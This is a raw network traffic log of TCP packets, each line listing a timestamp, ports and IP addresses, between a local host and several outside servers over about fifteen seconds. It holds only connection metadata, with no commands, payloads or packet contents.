Sep 6, 2024 09:58:58.741578102 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.768167019 CEST	80	49857	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:58.768351078 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.841078043 CEST	443	49860	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.841156960 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.852437019 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.852452040 CEST	443	49860	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.852579117 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.852627039 CEST	443	49860	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.854382038 CEST	49860	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.856132984 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:58.861035109 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:58.866972923 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.867005110 CEST	443	49862	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.867101908 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.867197990 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:58.867207050 CEST	443	49862	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:58.869602919 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.869906902 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.874702930 CEST	80	49857	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:58.874794960 CEST	49857	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.875005960 CEST	80	49863	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:58.875066996 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.875188112 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:58.881130934 CEST	80	49863	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:58.950752020 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.008876085 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.024858952 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.029872894 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.031676054 CEST	443	49861	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.031779051 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.036288023 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.036304951 CEST	443	49861	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.036379099 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.036474943 CEST	443	49861	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.037981987 CEST	49861	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.040141106 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.044913054 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.129280090 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.134752989 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.140733004 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.149101019 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.178795099 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.241357088 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.288333893 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.325362921 CEST	443	49862	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:59.325530052 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:59.328419924 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:59.328427076 CEST	443	49862	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:59.328700066 CEST	443	49862	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:59.330995083 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:59.330996037 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:59.331166983 CEST	443	49862	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:59.331223965 CEST	49862	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:59.337265968 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.342044115 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.356794119 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.356849909 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.357215881 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.357328892 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.357343912 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.383341074 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.383384943 CEST	443	49865	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.383470058 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.383492947 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.383501053 CEST	443	49866	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.383563995 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.383583069 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.383595943 CEST	443	49865	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.385056019 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.385071993 CEST	443	49866	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.431736946 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.435245991 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.440103054 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.472115040 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.530286074 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:59.575321913 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:59.586487055 CEST	80	49863	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:59.586555958 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.587383032 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.592132092 CEST	80	49863	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:59.815983057 CEST	80	49863	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:59.816508055 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.832175016 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.836498022 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.839895964 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.844594002 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.844608068 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.844913960 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.845885992 CEST	443	49865	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.852466106 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.854633093 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.854644060 CEST	443	49865	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.854939938 CEST	443	49865	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.859544039 CEST	443	49866	34.120.208.123	192.168.2.7
Sep 6, 2024 09:58:59.867341995 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.897787094 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.912974119 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:58:59.934838057 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.935075998 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.940020084 CEST	80	49863	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:59.940762043 CEST	80	49867	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:59.940881968 CEST	49863	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.941044092 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.941196918 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:59.945961952 CEST	80	49867	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:00.012016058 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.012171984 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.012284040 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.012312889 CEST	443	49866	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.012365103 CEST	443	49864	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.012368917 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.012607098 CEST	443	49866	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.013048887 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.013114929 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.013262033 CEST	443	49865	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.014058113 CEST	49864	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.014075994 CEST	49866	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.014091969 CEST	49865	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.015377045 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.018141985 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.018172026 CEST	443	49868	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.018398046 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.020196915 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.020477057 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.020493984 CEST	443	49868	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.109786987 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.116244078 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.121021986 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.170342922 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.210728884 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.270560026 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.502546072 CEST	443	49868	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.511411905 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.516432047 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.516454935 CEST	443	49868	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.516541004 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.516750097 CEST	443	49868	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.517299891 CEST	49868	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.519202948 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.522269011 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.522315979 CEST	443	49869	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.523401022 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.523988008 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.524790049 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:00.524808884 CEST	443	49869	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:00.637896061 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.640868902 CEST	80	49867	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:00.641000986 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.641501904 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.642628908 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.645804882 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.647383928 CEST	80	49867	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:00.687365055 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.735862017 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:00.787647963 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:00.868407011 CEST	80	49867	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:00.868508101 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.975703001 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.976057053 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.980745077 CEST	80	49867	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:00.981087923 CEST	80	49870	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:00.988326073 CEST	49867	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.988457918 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.991646051 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:00.996494055 CEST	80	49870	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:01.002547979 CEST	443	49869	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:01.002629995 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:01.006844044 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:01.006855965 CEST	443	49869	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:01.006937027 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:01.007160902 CEST	443	49869	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:01.010699987 CEST	49869	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:01.012340069 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:01.017131090 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:01.106839895 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:01.111459970 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:01.116296053 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:01.151078939 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:01.224765062 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:01.273550034 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:01.701314926 CEST	80	49870	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:01.701381922 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:01.702423096 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:01.707293987 CEST	80	49870	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:01.927808046 CEST	80	49870	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:01.927889109 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.038613081 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.038872004 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.043694973 CEST	80	49870	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:02.043798923 CEST	49870	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.043986082 CEST	80	49871	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:02.044111967 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.044225931 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.049213886 CEST	80	49871	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:02.092531919 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.092583895 CEST	443	49872	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:02.093583107 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.095088005 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.095107079 CEST	443	49872	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:02.607223988 CEST	443	49872	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:02.607300043 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.612215996 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.612235069 CEST	443	49872	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:02.612315893 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.612473965 CEST	443	49872	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:02.612632990 CEST	49872	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:02.812335968 CEST	80	49871	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:02.812444925 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.815664053 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:02.820579052 CEST	80	49871	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:03.108643055 CEST	80	49871	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:03.126737118 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:03.243644953 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:03.244019985 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:03.248791933 CEST	80	49871	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:03.249238968 CEST	80	49873	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:03.258311033 CEST	49871	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:03.258359909 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:03.259752035 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:03.264594078 CEST	80	49873	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:04.283353090 CEST	80	49873	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:04.283931971 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.294066906 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.298969030 CEST	80	49873	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:04.565701008 CEST	80	49873	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:04.565910101 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.672795057 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.673440933 CEST	49874	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.678035021 CEST	80	49873	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:04.678318977 CEST	80	49874	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:04.678936958 CEST	49873	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.678987980 CEST	49874	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.679124117 CEST	49874	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:04.684082031 CEST	80	49874	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:05.456711054 CEST	80	49874	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:05.456809044 CEST	49874	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:05.459990978 CEST	49874	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:05.460309029 CEST	49875	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:05.465063095 CEST	80	49874	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:05.465186119 CEST	49874	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:05.465379953 CEST	80	49875	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:05.465982914 CEST	49875	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:05.466120005 CEST	49875	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:05.470968008 CEST	80	49875	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:06.267957926 CEST	80	49875	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:06.268052101 CEST	49875	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:06.382441044 CEST	49875	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:06.385590076 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:06.390656948 CEST	80	49876	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:06.390770912 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:06.390897989 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:06.396295071 CEST	80	49875	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:06.396382093 CEST	49875	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:06.396718025 CEST	80	49876	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:06.398257971 CEST	49724	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:59:06.403378963 CEST	80	49724	31.41.244.11	192.168.2.7
Sep 6, 2024 09:59:06.403812885 CEST	49724	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:59:07.126308918 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:07.131323099 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:07.491403103 CEST	80	49876	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:07.491533995 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.493691921 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:07.494304895 CEST	80	49876	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:07.494738102 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:07.494771004 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.495179892 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:07.495304108 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.495893002 CEST	49877	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.500740051 CEST	80	49876	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:07.500755072 CEST	80	49877	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:07.500818014 CEST	49876	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.500865936 CEST	49877	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.501009941 CEST	49877	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:07.511862993 CEST	80	49877	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:07.566299915 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:07.571245909 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:07.705518961 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:07.773926973 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:08.250721931 CEST	80	49877	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:08.250824928 CEST	49877	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:08.364275932 CEST	49877	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:08.364598036 CEST	49878	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:08.369982004 CEST	80	49877	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:08.370007038 CEST	80	49878	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:08.376504898 CEST	49877	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:08.376559973 CEST	49878	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:08.378323078 CEST	49878	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:08.383131027 CEST	80	49878	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:09.136487007 CEST	80	49878	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:09.137094021 CEST	49878	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:09.140975952 CEST	49878	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:09.141320944 CEST	49879	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:09.146090984 CEST	80	49879	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:09.146130085 CEST	80	49878	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:09.146274090 CEST	49878	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:09.146290064 CEST	49879	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:09.146512032 CEST	49879	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:09.151326895 CEST	80	49879	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:10.057269096 CEST	80	49879	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:10.057367086 CEST	49879	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:10.173794985 CEST	49879	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:10.174066067 CEST	49880	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:10.179277897 CEST	80	49879	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:10.179328918 CEST	80	49880	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:10.179461956 CEST	49879	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:10.179497004 CEST	49880	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:10.179868937 CEST	49880	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:10.184662104 CEST	80	49880	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:11.393089056 CEST	80	49880	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:11.393239021 CEST	49880	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:11.396750927 CEST	49880	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:11.397032976 CEST	49881	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:11.401818037 CEST	80	49881	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:11.401916981 CEST	49881	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:11.401948929 CEST	80	49880	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:11.402033091 CEST	49880	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:11.402122974 CEST	49881	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:11.406997919 CEST	80	49881	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:12.212219000 CEST	80	49881	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:12.212297916 CEST	49881	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:12.325743914 CEST	49881	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:12.326052904 CEST	49882	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:12.330981016 CEST	80	49881	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:12.331034899 CEST	80	49882	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:12.331450939 CEST	49881	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:12.331499100 CEST	49882	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:12.331861019 CEST	49882	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:12.337131977 CEST	80	49882	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:13.148552895 CEST	80	49882	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:13.150717974 CEST	49882	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:13.154659986 CEST	49882	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:13.154954910 CEST	49883	80	192.168.2.7	31.41.244.10
